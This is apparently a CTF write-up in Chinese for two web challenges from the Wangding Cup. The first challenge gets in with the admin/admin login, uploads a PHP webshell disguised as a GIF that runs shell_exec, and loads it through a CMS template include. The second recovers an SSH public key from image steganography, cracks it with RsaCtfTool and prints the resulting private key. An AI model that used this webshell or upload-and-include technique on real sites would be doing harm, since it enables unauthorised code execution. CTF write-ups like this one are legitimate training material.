网鼎杯-玄武wp
web01
后台弱密码admin admin
随便找一个文件上传点,构造一个php的gif图片马,抓包记录一下上传的位置
GIF89a?
<?php
$a = "cat /f*";
$output = shell_exec($a);
echo $output;
echo "123";
?>
模板修改里面的pc/index.htm,观察到易优存在一个自己写的include功能
把文件改成我们的gif去加载,查看源代码即可发现flag
web03
这还是web吗
访问robots.txt,发现wbStego4.pkg,用wbStego4open解图片隐写,得到
RW_IHZ.KFY>HHS-IHZ AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=A-Z按照Z-A对换,发现是ID_RSA.PUB>SSH-RSA公钥
改一下头
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=可以被rsactftools破解
python RsaCtfTool.py --public key.txt --private
-----BEGIN RSA PRIVATE KEY-----
MIIEoQIBAAKCAQB6kiEmH5MLhXl9tCk7cg4aRv55sjCuTK5oyiC1Gy8aRLYMPuIt
LCEeLFrTaRklQDC2eGDvBGOqexQcNM+LtAC6NqgvCO+t5XypTVx9Vh1nsUR3e9jB
KcaTs7e/bpGmxK+zlqUXQxCEo9zMhGpVTWBkyjLf00Fkf3ZxXfk7AwdmkQwUEKvV
X0IWfWfOuIbkOA7vDyoONqZc30TybBIXuCaRNBluUEWqfWTRzP+H0khyZcKmwahn
XiI8PlO82P0aJMSve/fn+0jeqjHPRcwFE528BRi6WXuKIc+KTyTa5kSnxEU0ig6F
8NZK3Q2bhGcwoIqa6UfFqi7xqA14WLLXK4FlAgMBAAECggEAEk1juceZM2042PZf
+cpsJKxZL17WOhClMmyMOb7XZ7q+3FE/gLNINrM01MCqyo8tNvH+t3IWV8yNEjEo
lJnKSgQDVRKmh3bvCHDO0MBdH7CuopDRqvZL+p4pX+JoyVgxTEXAXRrcipHVVIyp
PBeTvzkaI6Xt683Ep+T6ZD9tiXkGR+GGsHj+YbxDnoPvIcIRv7HxdTQxVop0PQtF
kHhsluxB9OGLBCO691eQbu3YCRUcfPdG4FAHz6P+l2fDScmcCqkM3bVEifArJqw2
d+yZ3RH1rnJBQZlFX9C/Ng8z0lb1htCasPvhxpF+x/EPzTpckGIbRgrVwTyh2ry6
IguR+QKBgQCxI4PGvnrn5r5YTtrANLkL/uJyPxExqTulGJVGeRO6xG5nUXQ1zZIA
YM9gcg2Ry3gu43g3xYNTdpjHC34XQHbQXg77Lz20WbcT5bV0/2lLUFSnddFyiTtM
NaqX1QLU39q1IHEP0j1/JxAtNra/NMX3aj+yezZAfVlL24gAfjBCcwKBgQCxI4PG
vnrn5r5YTtrANLkL/uJyPxExqTulGJVGeRO6xG5nUXQ1zZIAYM9gcg2Ry3gu43g3
xYNTdpjHC34XQHbQXg77Lz20WbcT5bV0/2lLUFSnddFyiTtMNaqX1QLU39q1IHEP
0j1/JxAtNra/NMX3aj+yezZAfVlL24gAfjA+xwKBgDlycRwVTjrDBFwTRrIq5xBS
2xF+Do9yeNtz+4VdYt6hMcTkD7IbNwxUWSzIEEqGGDXso2JC9fItdiKnQX888stk
las0iOhiaBNV3eFRq843AR1GAmUIyGhQx0ByXna3GnC/Uqt03WjNPFvNcLrV3JX+
qSWy+8cyX7FQQu0V/4StAoGAeWWvf9s2/AsE1BxmimcXkoMBye4y6GfkuoaYdw2v
WcYZK7GFBQJ3Vs8CEETZy9s36Fp4HzC7ic2zcmYL6f+B7dcoSTjc/ualM3uv2hjY
nobVHVb/TZGDE/2LhjazlBQ+HPe4xHD/OE8bJQFkSLHwIlmsgbMzQQsm0XgIQt44
Ti0CgYBI7asWLkjuua/dAN+ByXNmtXbUEuJQFo8GJiwG9Ex66wQOwfF6X0FImSaI
7q77erandRIsv51IwxLHmSgzg2QdruTxN6umkvYhhPi7VYt8a2vW6w8mKuGsLPid
1CgcRUjiiUVspCxh1HCZsgg91boU+eeRpr5eorik8yoaWP2JYg==
-----END RSA PRIVATE KEY-----
然后ssh连接就得flag
